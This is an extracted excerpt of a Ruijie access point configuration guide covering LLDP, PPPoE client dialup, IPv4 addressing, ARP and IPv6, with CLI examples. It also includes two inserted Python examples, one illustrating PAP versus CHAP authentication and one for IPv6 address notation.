  • Page 317 The LLDP encapsulation format configuration on a device and its neighbors must be consistent. Configuration Example  Setting the LLDP Encapsulation Format to SNAP Configuration Set the LLDP encapsulation format to SNAP. Steps Ruijie(config)#interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#lldp encapsulation snap...
  • Page 318 Configuration Guide Configuring LLDP Verification Display LLDP status information on the interface. Ruijie(config-if-GigabitEthernet 0/1)#show lldp status interface gigabitethernet 0/1 Port [GigabitEthernet 0/1] Port status of LLDP : Enable Port state : UP Port encapsulation : Snap Operational mode : RxAndTx...
  • Page 319 Ruijie(config)#lldp network-policy profile 1 Ruijie(config-lldp-network-policy)# voice vlan 3 cos 4 Ruijie(config-lldp-network-policy)# voice vlan 3 dscp 6 Ruijie(config-lldp-network-policy)#exit Ruijie(config)# interface gigabitethernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)# lldp tlv-enable med-tlv network-policy profile 1 Verification Display the LLDP network policy configuration on the local device. network-policy information:...
  • Page 320 Configuration Guide Configuring LLDP -------------------------- network policy profile :1 voice vlan 3 cos 4 voice vlan 3 dscp 6 5.4.13 Configuring the Civic Address Configuration Effect  Configure the civic address of a device. Configuration Steps  Optional.  Perform this configuration in LLDP Civic Address configuration mode. Verification Display the LLDP civic address of the local device ...
  • Page 321 Configuration Guide Configuring LLDP additional-location-information: Indicates that the CA type is 22. name: Indicates that the CA type is 23. postal-code: Indicates that the CA type is 24. building: Indicates that the CA type is 25. unit: Indicates that the CA type is 26. floor: Indicates that the CA type is 27.
  • Page 322 Configuration Set the address of port GigabitEthernet 0/1 as follows: set country to CH, city to Fuzhou, and postal code to Steps 350000. Ruijie#config Ruijie(config)#lldp location civic-location identifier 1 Ruijie(config-lldp-civic)# country CH Ruijie(config-lldp-civic)# city Fuzhou Ruijie(config-lldp-civic)# postal-code 350000 Verification Display the LLDP civic address of port GigabitEthernet 0/1 1.
  • Page 323 Configuring the Emergency Telephone Number of a Device Configuration Set the emergency telephone number of port GigabitEthernet 0/1 to 085283671111. Steps Ruijie#config Ruijie(config)#lldp location elin identifier 1 elin-location 085283671111 Verification Display the emergency telephone number of port GigabitEthernet 0/1. elin location information: -------------------------...
  • Page 324 Configuration Guide Configuring LLDP 5.5 Monitoring Clearing Running the clear commands may lose vital information and thus interrupt services. Description Command Clears LLDP statistics. clear lldp statistics [ interface interface-name ] Clears LLDP neighbor information. clear lldp table [ interface interface-name ] Displaying Description Command...
  • Page 325: Scenario

    PPPoE: Point-to-point Protocol Over Ethernet Ruijie products support the PPPoE client on Ethernet interfaces, and are therefore able to connect to a host network by accessing a remote hub through a simple access device. The PPPoE protocol enables the PPPoE server to control each access client and perform relevant accounting.
  • Page 326 Configuration Guide Configuring PPPoE Client  The dialup function is enabled on the device. The device connects to a remote Internet service provider (ISP) over an ADSL line, and obtains Internet access capability.  Intranet PCs access the Internet through the device. Figure 6-1 6.2.1.2 Corresponding Protocols ...
  • Page 327: Scenario

    Configuration Guide Configuring PPPoE Client 6.3.1.2 Overview Feature Description Dialup to the Internet In a scenario where Internet access is implemented through the Asymmetric Digital Subscriber Line (ADSL) technology, the device provides dialup and packet forwarding functions. 6.3.2 Dialup to the Internet The device has Internet access capability after the dialup is complete;...
  • Page 328 Configuration Guide Configuring PPPoE Client Packet Forwarding Packet sending process: When a data packet is routed to the dialer interface, the device encapsulates the data packet with the prepared L2 header information and ultimately sends the data packet from a physical port. Packet receiving process: After a packet arrives at a physical port, the device marks the Layer 3 (L3) header position of the packet, executes the next service, and ultimately sends the packet to a host in the intranet.
  • Page 329 Run the no ppp chap hostname command to remove the user name configuration for CHAP authentication. Run the ppp chap password password command to configure the password for CHAP authentication. Run the no ppp chap password command to remove the password configuration for CHAP authentication. Run the ppp pap sent-username username password password command to configure the user name and password for PAP authentication. Note that PAP sends the user name and password in clear text over the link, whereas CHAP sends only an MD5 hash of the secret combined with a challenge from the server; prefer CHAP where the ISP supports it.
  • Page 330 Configuration Guide Configuring PPPoE Client 6.4 Configuration The PPPoE client function is supported only on AP120-W v1.0, AP130-W v1.1 , AP320I v1.x, AP320I v2.X , AP330-I v1.1, AP220-E(P) v2.0, AP520 v1.0, AP630 v1.0, AP5280 v1.0, AP530-I V2 v1.00, APD-M(AC), AP530 v1.0, AP530 v1.5 , AP320-I v1.0, AP320-I v1.1, AP220-E(C) v4.0, AP220-E(M)-V2 v3.0, AP220-E(P) v1.0, AP3220 v1.0, AP320-I v2.0, AP3220-P v1.0, AP4210 v1.0, APD-M v1.0, AP630(IODA) v1.00, AP630(IDA), AP520(DA), APD-M(AC) v1.00 and AP630 v1.00.
  • Page 331 Configuration Guide Configuring PPPoE Client 6.4.1 Configuring Basic Functions of the PPPoE Client 6.4.1.1 Networking Requirements  The device initiates PPPoE negotiation, and completes the negotiation process, protocol keepalive, and protocol termination.  The device obtains Internet access capability after the negotiation is complete, and starts to forward a data flow which is routed to the dialer interface.
  • Page 332 Configuration Guide Configuring PPPoE Client  The configuration is mandatory.  Perform this configuration in logical interface configuration mode.  Associate the logical interface with a specific dialer pool. Configuring the Encapsulation Protocol  The configuration is mandatory.  Perform this configuration in logical interface configuration mode. ...
  • Page 333 Configuration Guide Configuring PPPoE Client Defining a Dialer Triggering Rule  The configuration is mandatory.  Perform this configuration in global configuration mode.  Define a dialer triggering rule. Verification  Check whether the dialer interface has acquired an IP address. ...
  • Page 334 Configuration Guide Configuring PPPoE Client Description subnet-mask: manually configured subnet mask Command Mode Interface configuration mode Configuration If you select negotiate, the IP address of the dialer interface will be acquired through negotiation. Usage If you manually specify the IP address of the dialer interface, the peer's consent is required during negotiation for the device to work properly.
  • Page 335 Configuration Guide Configuring PPPoE Client Command Syntax ppp chap hostname username Parameter username: user name Description Command Mode Interface configuration mode Configuration Usage Configuring the Password for CHAP Authentication Command Syntax ppp chap password password Parameter password: password Description Command Mode Interface configuration mode Configuration Usage...
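As an added example (not RGOS code), the two PPP authentication methods the dialer interface can be configured for, implemented from RFC 1334 (PAP) and RFC 1994 (CHAP) so the difference between `ppp pap sent-username` and `ppp chap hostname` / `ppp chap password` is visible on the wire: PAP puts the password bytes in the Authenticate-Request, CHAP answers a random challenge with MD5(Identifier || secret || Challenge) and the server recomputes it from its stored copy. The user name, secret, server name and challenge bytes are constructed for the example.

```python
"""PPP authentication as negotiated by a PPPoE client: PAP (RFC 1334) carries
user name and password in clear text; CHAP (RFC 1994) sends
MD5(Identifier || secret || Challenge) so the secret never crosses the link.
Added example, not RGOS code; credentials and challenge bytes are constructed."""
import hashlib
import hmac
import os
import struct

PAP_AUTH_REQUEST = 1
CHAP_CHALLENGE, CHAP_RESPONSE = 1, 2


def pap_authenticate_request(identifier: int, username: bytes, password: bytes) -> bytes:
    """Code(1) Identifier(1) Length(2) Peer-ID-Length(1) Peer-ID Passwd-Length(1) Passwd."""
    body = bytes([len(username)]) + username + bytes([len(password)]) + password
    return struct.pack("!BBH", PAP_AUTH_REQUEST, identifier, 4 + len(body)) + body


def chap_challenge(identifier: int, name: bytes, size: int = 16) -> bytes:
    """Server -> client: Code Identifier Length Value-Size Value Name."""
    value = os.urandom(size)
    return struct.pack("!BBH", CHAP_CHALLENGE, identifier, 5 + size + len(name)) + bytes([size]) + value + name


def chap_response_value(identifier: int, secret: bytes, challenge_value: bytes) -> bytes:
    return hashlib.md5(bytes([identifier]) + secret + challenge_value).digest()


def chap_response(challenge_pkt: bytes, name: bytes, secret: bytes) -> bytes:
    """Client: answer a Challenge with Response = MD5(id || secret || value), plus its name."""
    code, identifier, _length = struct.unpack_from("!BBH", challenge_pkt)
    if code != CHAP_CHALLENGE:
        raise ValueError("not a CHAP Challenge")
    size = challenge_pkt[4]
    value = challenge_pkt[5:5 + size]
    resp = chap_response_value(identifier, secret, value)
    return struct.pack("!BBH", CHAP_RESPONSE, identifier, 5 + len(resp) + len(name)) + bytes([len(resp)]) + resp + name


def chap_verify(challenge_pkt: bytes, response_pkt: bytes, secrets: dict) -> bool:
    """Server: recompute from the stored secret for the claimed name and compare in
    constant time. The Identifier must match the outstanding challenge, so a
    Response captured for one challenge is useless against another."""
    c_id = challenge_pkt[1]
    r_code, r_id, _length = struct.unpack_from("!BBH", response_pkt)
    if r_code != CHAP_RESPONSE or r_id != c_id:
        return False
    size = response_pkt[4]
    value, name = response_pkt[5:5 + size], response_pkt[5 + size:]
    secret = secrets.get(name)
    if secret is None:
        return False
    expected = chap_response_value(c_id, secret, challenge_pkt[5:5 + challenge_pkt[4]])
    return hmac.compare_digest(value, expected)


def demo() -> dict:
    """Constructed exchange: what each method leaks, and what CHAP rejects."""
    user, pw = b"pppoe-user", b"s3cret"
    pap = pap_authenticate_request(1, user, pw)
    challenge = chap_challenge(7, b"isp-bras")
    response = chap_response(challenge, user, pw)
    other_challenge = chap_challenge(8, b"isp-bras")
    return {
        "pap_leaks_password": pw in pap,
        "chap_leaks_password": pw in challenge or pw in response,
        "chap_ok": chap_verify(challenge, response, {user: pw}),
        "chap_wrong_secret": chap_verify(challenge, response, {user: b"wrong"}),
        "chap_replay": chap_verify(other_challenge, response, {user: pw}),
    }
```

CHAP still requires the server to hold the secret in a recoverable form, and the MD5 construction is offline-crackable from a captured challenge and response when the secret is weak; it is an improvement over PAP, not a substitute for a strong password on the `ppp chap password` line.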
  • Page 336: Scenario

    Configuration Guide Configuring PPPoE Client In the ADSL scenario, enable the PPPoE client function and access the Internet through an ADSL line. Scenario Figure 6-2 Configuration  Enable the PPPoE client function on the device, and add the interface Gi0/5 to the dialer pool. Steps A# configure terminal A(config)# interface GigabitEthernet 0/5...
  • Page 337 Configuration Guide Configuring PPPoE Client A(config-if)# exit A(config)# access-list 1 permit any A(config)# dialer-list 1 protocol ip permit A(config)# ip nat inside source list 1 interface dialer 1 A(config)# ip route 0.0.0.0 0.0.0.0 dialer 1 A(config)# end Verification Run the show ip interface brief | in dialer 1 command to check whether the dialer interface has acquired an IP address.
  • Page 338 Configuration Guide Configuring PPPoE Client  Intranet hosts cannot access the Internet because NAT configuration is incorrect.  Intranet hosts cannot access the Internet because route configuration is incorrect. 6.5 Monitoring 6.5.1.1 Clearing Various Information If you run the clear pppoe tunnel command while the device is operating, packet forwarding will be interrupted due to tunnel clearance.
  • Page 340 RG-WLAN Series Access Point RGOS Configuration Guide, Release 11.1(5)B8 IP Address & Application Configuration 1. Configuring IP Address and Service 2. Configuring ARP 3. Configuring IPv6 4. Configuring DHCP 5. Configuring DHCPv6 6. Configuring DNS 7. Configuring Network Connectivity Test Tools 8.
  • Page 341: Scenario

    Configuration Guide Configuring IP Addresses and Services 1 Configuring IP Addresses and Services 1.1 Overview Internet Protocol (IP) sends packets to the destination from the source by using logical (or virtual) addresses, namely IP addresses. At the network layer, routers forward packets based on IP addresses. Protocols and Standards ...
  • Page 342 Configuration Guide Configuring IP Addresses and Services  On hosts in the network segment 172.16.1.0/24, set the gateway to 172.16.1.1; on hosts in the network segment 172.16.2.0/24, set the gateway to 172.16.2.1. 1.3 Features Basic Concepts  IP Address An IP address consists of 32 bits in binary. To facilitate writing and description, an IP address is generally expressed in decimal.
  • Page 343 Configuration Guide Configuring IP Addresses and Services For a class D address, the first four most significant bits are 1110 and other bits indicate a multicast address. Figure 1-5 Class Multicast address address The addresses with the first four most significant bits 1111 cannot be assigned. These addresses are called class E addresses and are reserved.
  • Page 344 Broadcast Packet Broadcast packets refer to the packets destined for all hosts on a physical network. Ruijie products support two types of broadcast packets: (1) directed broadcast, which indicates that all hosts on the specified network are packet receivers and the host bits of a destination address are all 1s;...
  • Page 345 Configuring Multiple IP Addresses for an Interface Ruijie products support multiple IP address configuration on one interface, of which one is a primary IP address and the others are secondary IP addresses. Theoretically, the number of secondary IP addresses is not limited. However, secondary IP addresses must belong to different networks and secondary IP addresses must be in different networks from primary IP addresses.
  • Page 346 Configuration Guide Configuring IP Addresses and Services  Obtaining an IP Address through PPP Negotiation This command is supported on point-to-point interfaces only. Through this configuration, a point-to-point interface accepts the IP address assigned by the peer end through PPP negotiation.
  • Page 347 Configuration Guide Configuring IP Addresses and Services 1.3.2 Broadcast Packet Processing Working Principle Broadcast is divided into two types. One is limited broadcast, whose IP address is 255.255.255.255. Because routers do not forward it, this broadcast is also called local network broadcast. The other is directed broadcast, in which all host bits are 1s, for example, 192.168.1.255/24.
  • Page 348 Configuration Guide Configuring IP Addresses and Services 1.3.3 Sending ICMP Packets Working Principle  ICMP Protocol Unreachable Message A device receives non-broadcast packets destined for itself, and the packets carry an IP protocol that the device cannot process. The device sends an ICMP protocol unreachable message to the source host. Besides, if the device does not know a route to forward packets, it also sends an ICMP host unreachable message.
  • Page 349 If an IP packet exceeds the IP MTU size, the RGOS software splits the packet. For all devices in the same physical network segment, the IP MTU of interconnected interfaces must be the same. You can adjust the link MTU of interfaces on Ruijie products.
  • Page 350 Working Principle Ruijie products support IP source routes. When a device receives an IP packet, it checks the options such as source route, loose source route, and record route in the IP packet header. These options are detailed in RFC 791. If the device detects that the packet enables one option, it responds;...
  • Page 351 Configuration Guide Configuring IP Addresses and Services 1.4 Configuration The IPv4 functions of Ping and Traceroute are not supported on AP110-W. Configuration Description and Command (Mandatory) It is used to configure an IP address and allow the IP protocol to run on an interface.
  • Page 352 Configuration Guide Configuring IP Addresses and Services 1.4.1 Configuring the IP Addresses of an Interface Configuration Effect Configure the IP address of an interface for communication. Notes  Configuration Steps  Configuring the IP Address of an Interface  Mandatory ...
  • Page 353 A device cannot be cold started through an unnumbered interface. Configuration Example  Configuring an IP Address for an Interface Configuration Configure IP address 192.168.23.110 255.255.255.0 on interface GigabitEthernet 0/0. Steps Ruijie#configure terminal Ruijie(config)#interface gigabitEthernet 0/0 Ruijie(config-if-GigabitEthernet 0/0)# no switchport...
  • Page 354 Configuring IP Addresses and Services Ruijie(config-if-GigabitEthernet 0/0)#ip address 192.168.23.110 255.255.255.0 Verification Run the show ip interface command to check whether the configuration takes effect. Ruijie# show ip interface gigabitEthernet 0/0 GigabitEthernet 0/0 IP interface state is: UP IP interface type is: BROADCAST...
  • Page 355 Configuration Guide Configuring IP Addresses and Services  (Optional) Some old hosts may identify broadcast address 0.0.0.0 only. In this case, set the broadcast address of the target interface to 0.0.0.0.  Perform the configuration in L3 interface configuration mode. ...
  • Page 356 Ruijie(config-if-GigabitEthernet 0/1)# no switchport Ruijie(config-if-GigabitEthernet 0/1)#ip broadcast-address 0.0.0.0 Ruijie(config-if-GigabitEthernet 0/1)#ip directed-broadcast Verification Run the show ip interface command to check whether the configuration takes effect. Ruijie#show running-config interface gigabitEthernet 0/1 ip directed-broadcast ip broadcast-address 0.0.0.0 1.4.3 Configuring ICMP Forwarding Configuration Effect Enable ICMP unreachable messages, ICMP redirection messages, and mask response messages on an interface.
  • Page 357 Configuration Guide Configuring IP Addresses and Services  Perform the configuration in L3 interface configuration mode. Verification Run the show ip interface command to check whether the configuration takes effect. Related Commands  Enabling ICMP Unreachable Messages Command ip unreachables Parameter Description Command...
  • Page 358 Ruijie(config-if-GigabitEthernet 0/1)# ip redirects Ruijie(config-if-GigabitEthernet 0/1)# ip mask-reply Verification Run the show ip interface command to check whether the configuration takes effect. Ruijie#show ip interface gigabitEthernet 0/1 GigabitEthernet 0/1 ICMP mask reply is: ON Send ICMP redirect is: ON Send ICMP unreachabled is: ON 1.4.4 Configuring the Transmission Rate of ICMP Error Packets...
  • Page 359 Configuration Guide Configuring IP Addresses and Services Related Commands  Configuring the Transmission Rate of ICMP Destination Unreachable Packets Triggered by the DF Bit in the IP Header Command ip icmp error-interval DF milliseconds [bucket-size] Parameter milliseconds: Refresh cycle of a token bucket. The value range is from 0 to 2,147,483,647 and the default Description value is 100 milliseconds.
  • Page 360 Set the transmission rate of ICMP destination unreachable packets triggered by the DF bit in the IP header to 100 Steps packets per second and the transmission rate of other ICMP error packets to 10 packets per second. Ruijie(config)# ip icmp error-interval DF 1000 100 Ruijie(config)# ip icmp error-interval 1000 10 Verification Run the show running-config command to check whether the configuration takes effect.
  • Page 361 Ruijie(config-if-GigabitEthernet 0/1)# no switchport Ruijie(config-if-GigabitEthernet 0/1)#ip mtu 512 Verification Run the show ip interface command to check whether the configuration takes effect. Ruijie# show ip interface gigabitEthernet 0/1 IP interface MTU is: 512 1.4.6 Setting the IP TTL Configuration Effect Modify the IP TTL value of an interface.
  • Page 362  Configuration Set the TTL of unicast packets to 100. Steps Ruijie#configure terminal Ruijie(config)#ip ttl 100 Verification Run the show running-config command to check whether the configuration takes effect. Ruijie#show running-config ip ttl 100 1.4.7 Configuring an IP Source Route Configuration Effect Enable or disable the IP source route function.
  • Page 363 Configuration Guide Configuring IP Addresses and Services Ruijie#configure terminal Ruijie(config)#no ip source-route Verification Run the show running-config command to check whether the configuration takes effect. Ruijie#show running-config no ip source-route 1.4.8 Configuring an IP Address Pool Configuration Effect Assign an IP address to a client through PPP negotiation.
  • Page 364 Configuration Guide Configuring IP Addresses and Services Global configuration mode Command Mode Usage Guide By default, the IP address pool function is enabled. You can configure an IP address pool to assign an IP address to the peer end through PPP negotiation. To disable the IP address pool function, run the no ip address-pool local command.
  • Page 365 Configuration Guide Configuring IP Addresses and Services Ruijie#configure terminal Ruijie(config)# ip address-pool local Ruijie(config)# ip local pool quark 172.16.23.2 172.16.23.255 Ruijie(config)# interface dialer 1 Ruijie(config-if-dialer 1)#peer default ip address pool quark Verification Run the show running-config command to check whether the configuration takes effect.
  • Page 366: Scenario

    Configuration Guide Configuring ARP 2 Configuring ARP 2.1 Overview In a local area network (LAN), each IP network device has two addresses: 1) local address. Since the local address is contained in the header of the data link layer (DLL) frame, it is a DLL address. However, it is processed by the MAC sublayer at the DLL and thereby is usually called the MAC address.
  • Page 367: Scenario

    Configuration Guide Configuring ARP Figure 2-1 Remarks A is a router. B is a switch. It acts as the gateway. C, D, and E are hosts. Deployment  Enable ARP in a LAN to implement IP-MAC mapping. 2.2.2 Proxy ARP-based Transparent Transmission Scenario Transparent transmission across IPv4 LANs is performed.
  • Page 368 Configuration Guide Configuring ARP 2.3 Features Overview Feature Description Static ARP Users can manually specify IP-MAC mapping to prevent the device from learning incorrect ARP entries. ARP Attributes Users can specify the ARP entry timeout, ARP request retransmission times and interval, and maximum number of unresolved ARP entries.
  • Page 369 Configuration Guide Configuring ARP When the ARP timeout is set to a smaller value, the mapping table stored in the ARP cache is more accurate but ARP consumes more network bandwidth.  ARP Request Retransmission Interval and Times The device consecutively sends ARP requests to resolve an IP address to a MAC address. The shorter the retransmission interval is, the faster the resolution is.
  • Page 370: Proxy Arp

    Configuration Guide Configuring ARP 2.3.3 Gratuitous ARP Working Principle Gratuitous ARP packets are a special type of ARP packets. In a gratuitous ARP packet, the source and destination IP addresses are the IP address of the local device. Gratuitous ARP packets have two purposes: IP address conflict detection.
  • Page 371 Configuration Guide Configuring ARP device receives an ARP update packet from the peer end within the aging time, it stores the entry. If not, it deletes the entry. If the corresponding ARP entry exists, NUD is not performed. If the MAC address in the existing dynamic ARP entry is updated, the device also performs NUD. Since this function adds a strict confirmation procedure in the ARP learning process, it affects the efficiency of ARP learning.
  • Page 372 Configuration Guide Configuring ARP Configuration Description and Command Enabling Gratuitous ARP (Optional) It is used to detect IP address conflicts and enables peripheral devices to update ARP entries. arp gratuitous-send interval Enables gratuitous ARP. Enabling Proxy ARP (Optional) It is used to act as a proxy to reply to ARP requests from the devices in different subnets.
  • Page 373: Scenario

    Configuration Configure a static ARP entry on B to statically bind the IP address of A with the MAC address. Steps Ruijie(config)#arp 192.168.23.1 00D0.F822.334B arpa Verification Run the show arp static command to display the static ARP entry. Ruijie(config)#show arp static...
  • Page 374 Configuration Guide Configuring ARP  Optional.  If network resources are insufficient, it is recommended to set the maximum number of unresolved ARP entries to a small value to reduce the consumption of network bandwidth.  Configure the maximum number of unresolved ARP entries in global configuration mode. 
  • Page 375: Scenario

    Set the ARP request retransmission times to 4.  Set the maximum number of unresolved ARP entries to 4,096. Ruijie(config)#interface gigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#arp timeout 60 Ruijie(config-if-GigabitEthernet 0/1)#arp cache interface-limit 300 Ruijie(config-if-GigabitEthernet 0/1)#exit Ruijie(config)#arp retry interval 3 Ruijie(config)#arp retry times 4 Ruijie(config)#arp unresolve 4096 ...
  • Page 376 GigabitEthernet 0/7 3600 VLAN 100 3600 VLAN 111 3600 Mgmt 0 3600 Ruijie(config)# show running-config arp unresolve 4096 arp retry times 4 arp retry interval 3 interface GigabitEthernet 0/1 arp cache interface-limit 300 2.4.3 Enabling Gratuitous ARP Configuration Effect The interface periodically sends gratuitous ARP packets.
  • Page 377: Scenario

    Configure the GigabitEthernet 0/0 interface to send a gratuitous ARP packet every 5 seconds. Configuration Steps Ruijie(config-if-GigabitEthernet 0/0)#arp gratuitous-send interval 5 Verification Run the show running-config interface command to check whether the configuration takes effect. Ruijie#sh running-config interface gigabitEthernet 0/0 Building configuration...
  • Page 378: Scenario

    Steps Ruijie(config-if-GigabitEthernet 0/0)#ip proxy-arp Verification Run the show ip interface command to check whether the configuration takes effect. Ruijie#show ip interface gigabitEthernet 0/0 GigabitEthernet 0/0 IP interface state is: DOWN IP interface type is: BROADCAST IP interface MTU is: 1500...
  • Page 379 Configuration Guide Configuring ARP TTL invalid packet number: 0 ICMP packet input number: 0 Echo request Echo reply Unreachable Source quench Routing redirect 2.4.5 Enabling ARP Trustworthiness Detection Configuration Effect Enable ARP trustworthiness detection. If the device receiving an ARP request packet fails to find the corresponding entry, it performs NUD.
  • Page 380: Scenario

    Enable ARP trustworthiness detection on port GigabitEthernet 0/0. Steps Ruijie(config-if-GigabitEthernet 0/0)#arp trust-monitor enable Verification Run the show running-config interface command to check whether the configuration takes effect. Ruijie#show running-config interface gigabitEthernet 0/0 Building configuration... Current configuration : 184 bytes interface GigabitEthernet 0/0 duplex auto speed auto ip address 30.1.1.1 255.255.255.0...
  • Page 381: Scenario

    Disable dynamic ARP entry learning on port GigabitEthernet 0/0. Steps Ruijie(config-if-GigabitEthernet 0/0)#no arp-learning enable Verification Run the show running-config interface command to check whether the configuration takes effect. Ruijie#sh running-config interface gigabitEthernet 0/0 Building configuration... Current configuration : 127 bytes interface GigabitEthernet 0/0 duplex auto speed auto ip address 30.1.1.1 255.255.255.0...
  • Page 382 Configuration Guide Configuring ARP clear arp-cache Clears dynamic ARP entries. In gateway authentication mode, dynamic ARP entries in authentication VLANs are not cleared. Displaying Description Command Displays the ARP table. show ip arp Displays the ARP entry counter. show arp counter Displays the timeout of dynamic ARP entries. show arp timeout
  • Page 383 Configuration Guide Configuring IPv6 3 Configuring IPv6 3.1 Overview As the Internet develops rapidly and the IPv4 address space becomes exhausted, the limitations of IPv4 become more and more obvious. Much research and practical work on Internet Protocol Next Generation (IPng) has been conducted. The IPng working group of the Internet Engineering Task Force (IETF) has formulated an IPng protocol named IP Version 6 (IPv6), which is described in RFC 2460.
  • Page 384: Scenario

    Configuration Guide Configuring IPv6 (ESP). AH provides data integrity and authenticates IP packet sources to ensure that the packets originate from the nodes identified by the source addresses. ESP provides data encryption to realize end-to-end encryption.  Better QoS Support A new field in the IPv6 packet header defines how to identify and process data streams.
  • Page 385 Configuration Guide Configuring IPv6 Deployment Hosts can use the stateless address auto-configuration or DHCPv6 address assignment mode. After addresses are configured, hosts can communicate with each other using IPv6 addresses. 3.3 Features Overview Feature Description IPv6 Address The IPv6 address format makes IPv6 have a larger address space and flexible representation Format approach.
  • Page 386 Configuration Guide Configuring IPv6 1080:0:0:0:8:800:200C:417A These integers are hexadecimal, where A to F represent 10 to 15. Each integer in the address must be represented, except the leading zeros in each integer. If an IPv6 address contains a string of zeros (as shown in the second and third examples above), a double colon (::) can be used to represent these zeros.
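An added example, not from the Ruijie guide, that implements the notation rules just stated (every 16-bit group written, leading zeros dropped, one run of zero groups replaced by "::") and checks the result against the Python standard library; the page's own address 1080:0:0:0:8:800:200C:417A is used as input, and the choice to compress only the first longest run of at least two zero groups (the RFC 5952 canonical form, emitted in lowercase) is this example's assumption.

```python
"""
Expand and compress IPv6 text addresses by the rules given in the guide.
Added example; not part of the Ruijie RGOS documentation.
"""
import ipaddress
import re

# A single group: one to four hexadecimal digits (leading zeros optional).
_GROUP = re.compile(r"^[0-9a-fA-F]{1,4}$")


def expand(addr: str) -> list[int]:
    """Parse an IPv6 text address into its eight 16-bit groups as integers."""
    if addr.count("::") > 1:
        raise ValueError("at most one '::' is allowed in an IPv6 address")
    if "::" in addr:
        head, tail = addr.split("::")
        head_groups = head.split(":") if head else []
        tail_groups = tail.split(":") if tail else []
        # '::' stands for at least one group of zeros, enough to reach eight groups.
        missing = 8 - len(head_groups) - len(tail_groups)
        if missing < 1:
            raise ValueError("'::' must stand for at least one zero group")
        groups = head_groups + ["0"] * missing + tail_groups
    else:
        groups = addr.split(":")
    if len(groups) != 8:
        raise ValueError(f"expected 8 groups, got {len(groups)}")
    for group in groups:
        if not _GROUP.match(group):
            raise ValueError(f"invalid group {group!r}")
    return [int(group, 16) for group in groups]


def is_valid(addr: str) -> bool:
    """True if the text form can be parsed into eight groups."""
    try:
        expand(addr)
        return True
    except ValueError:
        return False


def compress(addr: str) -> str:
    """Canonical short form: leading zeros dropped, first longest run of two or
    more zero groups replaced by '::' (assumption: RFC 5952 rules, lowercase)."""
    groups = expand(addr)
    best_start, best_len = -1, 0
    i = 0
    while i < 8:
        if groups[i] == 0:
            j = i
            while j < 8 and groups[j] == 0:
                j += 1
            if j - i > best_len:          # strictly greater: keep the first run on ties
                best_start, best_len = i, j - i
            i = j
        else:
            i += 1
    hex_groups = [format(g, "x") for g in groups]
    if best_len < 2:                       # a single zero group is written as "0"
        return ":".join(hex_groups)
    head = ":".join(hex_groups[:best_start])
    tail = ":".join(hex_groups[best_start + best_len:])
    return f"{head}::{tail}"


def agrees_with_stdlib(addr: str) -> bool:
    """Cross-check this implementation against ipaddress.IPv6Address."""
    ref = ipaddress.IPv6Address(addr)
    ref_groups = [int(g, 16) for g in ref.exploded.split(":")]
    return expand(addr) == ref_groups and compress(addr) == ref.compressed


if __name__ == "__main__":
    for sample in ("1080:0:0:0:8:800:200C:417A", "0:0:0:0:0:0:0:1", "2001:db8:0:0:1:0:0:1"):
        print(f"{sample} -> {compress(sample)} (stdlib agrees: {agrees_with_stdlib(sample)})")
```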
  • Page 387 Configuration Guide Configuring IPv6 Unicast addresses fall into five types: unspecified address, loopback address, link-local address, site-local address, and global unicast address. At present, site-local addresses have been abolished. Except unspecified, loopback, and link-local addresses, all other addresses are global unicast addresses. ...
  • Page 388: Scenario

    Configuration Guide Configuring IPv6 Among global unicast addresses, there is a type of IPv4-embedded IPv6 addresses, including IPv4-compatible IPv6 addresses and IPv4-mapped IPv6 addresses. They are used for interconnection between IPv4 nodes and IPv6 nodes. The format of an IPv4-compatible IPv6 address is as follows: Figure 3-5 The format of an IPv4-mapped IPv6 address is as follows: Figure 3-6...
  • Page 389 Configuration Guide Configuring IPv6  Group ID field The group ID consists of 112 bits to identify a multicast group. A multicast ID can represent different groups based on the flag and scope fields. IPv6 multicast addresses are prefixed with FF00::/8. One IPv6 multicast address usually identifies interfaces on a series of different nodes.
  • Page 390 Configuration Guide Configuring IPv6 Related Configuration  Configuring an IPv6 Address  No IPv6 address is configured on interfaces by default.  Run the ipv6 address command to configure the IPv6 unicast address and anycast address of an interface.  After an interface goes up, it will automatically join the corresponding multicast group.
  • Page 391 Configuration Guide Configuring IPv6  Payload Length This field consists of 16 bits, including the packet payload length and the length of IPv6 extended options (if available). That is, it includes the IPv6 packet length except the IPv6 packet header. ...
  • Page 392 Configuration Guide Configuring IPv6 3.3.4 IPv6 PMTUD Similar to IPv4 Path MTU Discovery (PMTUD), IPv6 PMTUD allows a host to dynamically discover and adjust the MTU size on the data Tx path. If the length of a data packet to be sent by a host is greater than the PMTU, the host performs packet fragmentation on its own.
  • Page 393 Configuration Guide Configuring IPv6 the NS packet, that is, the link-layer address of the solicited node. After receiving this NA packet, the source node can communicate with the destination node. Figure 3-11 shows the address resolution process. Figure 3-11  If the reachable time of a neighbor has elapsed but an IPv6 unicast packet needs to be sent to it, the device performs NUD.
  • Page 394 Configuration Guide Configuring IPv6  One or multiple IPv6 address prefixes (used for on-link determination or stateless address auto-configuration)  Validity of the IPv6 address prefix  Host auto-configuration method (stateful or stateless)  Default device information (whether the device acts as the default device; if yes, the interval for acting as the default device is also included.) ...
  • Page 395 Configuration Guide Configuring IPv6  You can configure the maximum number of ND options to prevent forged ND packets from carrying unlimited ND options and occupying excessive CPU space on the device.  Maximum Number of Neighbor Learning Entries on an Interface ...
  • Page 396 Configuration Guide Configuring IPv6  By default, an IPv6 interface does not send RA packets.  Run the no ipv6 nd suppress-ra command in interface configuration mode to disable RA suppression.  Configuring the Maximum Number of Unresolved ND Entries ...
  • Page 397 Configuration Guide Configuring IPv6 Routing header fields (one byte each unless noted): Next header; Extended header length; Route type; Remaining segments; Reserved; Address 1 ... Address N. The following example describes the application of the Type 0 routing header, as shown in Figure 3-15. Figure 3-15 Host 1 sends Host 2 a packet specifying the intermediate nodes Router 2 and Router 3.
  • Page 398 Configuration Guide Configuring IPv6 Host 2 No change The forwarding process is as follows: Host 1 sends a packet in which the destination address is Router 2's address 1001::1, the Type 0 routing header is filled with Router 3's address 1002::1 and Host 2's address 1003::2, and the value of the Segments Left field is 2. Router 1 forwards this packet to Router 2.
  • Page 399 PMTUD. Therefore, it is recommended to restrict the sending rate of ICMPv6 Packet Too Big messages independently of other ICMPv6 error messages. Although ICMPv6 Redirect packets are not ICMPv6 error messages, Ruijie recommends restricting their rates together with ICMPv6 error messages except Packet Too Big messages.
